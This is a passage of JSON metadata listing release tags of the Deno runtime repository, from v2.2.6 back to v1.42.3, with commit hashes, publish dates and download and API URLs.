es_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://re